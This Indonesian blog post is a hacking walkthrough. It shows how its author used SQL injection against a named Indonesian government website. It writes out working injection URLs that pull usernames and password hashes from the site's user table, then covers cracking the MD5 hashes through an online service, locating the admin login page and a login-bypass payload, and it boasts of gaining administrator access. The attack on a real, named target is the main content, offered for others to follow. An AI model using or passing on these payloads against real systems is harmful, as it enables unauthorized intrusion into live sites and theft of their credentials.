Darkside of Oktavianus

Making virus and all of them as our friends

SQL injection (lagi dan lagi) di situs pemerintah

Posted by oktavianus pada September 9, 2008

Oleh tomahawk_underground
Published: September 9, 2008
langsung aja….saya masuk ke situs http://www.bkkbn.go.id, kemudia ke URL http://www.bkkbn.go.id/article.php?cid=27

yup…yang paling gampang untuk memeriksa situs ini bisa diinjek atau tidak (tapi gk selamanya juga sih) ada lah dengan menghapus baris sebelah tanda = , kmudian diisi dengan tanda ‘.

jika ada pesan error, misalnya :
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in bla bla bla….

yaa tandanya calon2 isa diinject nih… (tapi gk selamanya bisa lhooo)

kemudian saya masukkin SQL injection seperti ini :

http://www.bkkbn.go.id/article.php?cid=27+UNION+SELECT+1,2,3,4+FROM+user+–

arti dari : 1,2,3,4 ini = coba2 aja…diurutin tuh satu2 dari angka 1,2,3,4,……. sampe nongol field nya
arti dari : user = nama table (nebak…)

nah..nongol deh field nya :

ada di field 3…(gitu deh…). terus selanjutnya ganti angka 3 tadi ama inject nya…saya merubahnya jadi bgini :

http://www.bkkbn.go.id/article.php?cid=27+UNION+SELECT+1,2,concat_ws(0x3a,user_name,user_password),4+FROM+user+–

angka 3 diganti jadi concat_ws(0x3a,user_name,user_password)
meminta username ama password (gitu deh…)

nah…password di enkrip kan tuh pake MD5, yaa tinggal di dekrip aja lah…yg gampang sih dekrip ke http://www.passcracking.com

udeh tuh dapet kan hasil dekrip nya…sekarang tinggal cari halaman admin loginnya . seperti biasa, rata-rata situs standart tuh menu adminnya terletak di folder admin, jadi bgini :

http://www.bkkbn.go.id/admin/index.php

naahh…masuk deh

selanjutnya tinggal masukin aja user ID ama password nya.

JREENGGG!!!! REBES!! masuk deh
ada yang sebagai administrator, ada yang sebagai penulis

sebenernya sih bisa juga masuk sebagai penulis pake inject

username : 1′ or ‘1=1’/*
password : 1’ or ‘1=1’/*

tapi hanya sebagai penulis, bukan administrator.

akhir kata saya mau mengucapkan terimakasih kepada :
# My Lord Allah SWT
# kampus tercinta IPB, khususnya jurusan teknik komputer, kan kuangkat nama kampus ku
# member jasakom, khususnya yg nongkrong di forum (pl4y312, pitaqh, aurel666, massmissile, kucing item, cruzen, t0m, sanca,mmm…siapa lagi yaa…byk bgt deh..maap yg gk kesebut, tapi luv u all )

special thanks to :
# Om PIRUS (makasih free email nya )
# th30nly (ngutang banyak ama lo nih ilmunya)
# JS member dgn ID “new-bee” (yg ikut kerjasama pas pagi-pagi, wekekeke…)
# Tique –> artikel ini special buat kamu, tanda permohonan maaf dari saya (daripada di deface, mending jadi artikel). sekalian buat membuktikan kalo saya bukan hacker, apalagi hacker autis.

salam

tomahawk[at]jasakom[dot]org

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: